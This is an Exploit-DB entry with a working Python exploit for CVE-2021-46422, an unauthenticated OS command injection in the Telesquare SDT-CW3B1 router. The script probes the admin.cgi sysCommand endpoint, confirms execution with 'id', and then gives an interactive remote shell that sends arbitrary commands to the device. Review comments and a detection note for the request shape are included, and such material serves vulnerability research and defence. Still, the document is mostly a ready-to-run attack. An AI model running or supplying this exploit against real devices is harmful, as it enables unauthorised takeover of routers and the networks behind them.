Telesquare SDT-CW3B1 1.1.0 - OS Command Injection

EDB-ID:

50948




Platform:

Hardware

Date:

2022-06-03


#!/usr/bin/python3 

# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
# Date: 24th May 2022
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: http://telesquare.co.kr/
# CVE : CVE-2021-46422
# Authentication Required: No

import requests 
import argparse 
import sys
from xml.etree import ElementTree

def sysArgument():
	"""Parse the command line and return the value passed to --host.

	--host is mandatory; argparse exits with a usage error when it is
	missing. Only the host string is returned, nothing else is kept.
	"""
	parser = argparse.ArgumentParser()
	parser.add_argument("--host", required=True, help="target hostname/IP")
	namespace = parser.parse_args()
	# Attribute access on the Namespace instead of converting it to a dict.
	return namespace.host

def checkHost(host):
	"""Issue a single GET to http://<host>/ as a reachability probe.

	The response is discarded: neither the status code nor the body is
	inspected, so "alive" only means the request returned without a
	requests Timeout. A Timeout is converted into SystemExit.

	NOTE(review): requests.get() is called without timeout=, so the call
	can block indefinitely and the Timeout handler is unlikely to fire;
	a ConnectionError (host down, refused) is not caught and propagates.
	"""
	target = "http://" + host

	print("[*] Checking host is it alive?")

	try:
		requests.get(target)
	except requests.exceptions.Timeout as err:
		raise SystemExit(err)
	else:
		print("[*] The host is alive.")

def exploit(host):
	"""Probe the sysCommand CGI endpoint and, if it answers, run an interactive loop.

	Flow (plain HTTP, no authentication):
	  1. GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd= and require HTTP 200.
	  2. Send the probe value "id" and collect the text of every <CmdResult>
	     element in the XML response.
	  3. If at least one result came back, read lines from stdin and append
	     each one verbatim to the Cmd parameter until ".exit" is entered.
	Every failure path calls sys.exit(0), so the process exit status does not
	distinguish success from failure.

	Detection note: the request shape is a GET to /cgi-bin/admin.cgi with
	Command=sysCommand and a non-empty Cmd parameter, which is the indicator
	to log or alert on at the device or an upstream proxy.
	"""
	url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=" 

	# Existence probe: only the status code is inspected here.
	rsl = requests.get(url)

	if(rsl.status_code == 200):
		print("[*] CGI script exist!")
		print("[*] Injecting some shell command.")

		# First probe value; its output is used to confirm the endpoint echoes results.
		cmd = "id"

		try:
			# stream=True so iterparse can consume the raw response body directly.
			# NOTE(review): no timeout= is passed, so this can block indefinitely.
			rsl = requests.get(url + cmd, stream=True)
			xmlparser = ElementTree.iterparse(rsl.raw)

			cmdRet = []

			for event, elem in xmlparser:
				if(elem.tag == 'CmdResult'):
					cmdRet.append(elem.text)
		# NOTE(review): bare except also swallows KeyboardInterrupt and SystemExit
		# and hides the real cause (non-XML body, connection failure, ...).
		except:
			print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
			sys.exit(0)

		if(len(cmdRet) != 0):
			print("[*] There's response from the CGI script!")
			# NOTE(review): elem.text is None for an empty <CmdResult/>, so .strip()
			# would raise AttributeError here.
			print('[*] System ID: ' + cmdRet[0].strip())
			
			print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
			# Interactive loop; the only exit is the ".exit" sentinel or an exception.
			while(True):
				cmdInput = input("[SDT-CW3B1 Shell]# ")

				if(cmdInput == ".exit"):
					print("[*] Exiting shell.")
					sys.exit(0)

				# Input is appended to the URL verbatim (no percent-encoding);
				# exceptions from this request are not handled inside the loop.
				rsl = requests.get(url + cmdInput, stream=True)
				xmlparser = ElementTree.iterparse(rsl.raw)


				for event, elem in xmlparser:
					if(elem.tag == 'CmdResult'):
						# Same None risk as above for an empty <CmdResult/>.
						print(elem.text.strip())

				# Two blank lines between command outputs.
				print('\n')
				
		else:
			print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")
			sys.exit(0)

	else:
		print("[!] CGI script not found.")
		print(rsl.status_code)
		sys.exit(0)

def main():
	"""Entry point: read --host, run the reachability probe, then exploit()."""
	target = sysArgument()
	# checkHost() runs first; exploit() is only reached if it returns
	# (it raises SystemExit on a requests Timeout).
	for step in (checkHost, exploit):
		step(target)

if __name__ == "__main__":
	# Script entry only; importing the module defines functions and
	# performs no network activity.
	main()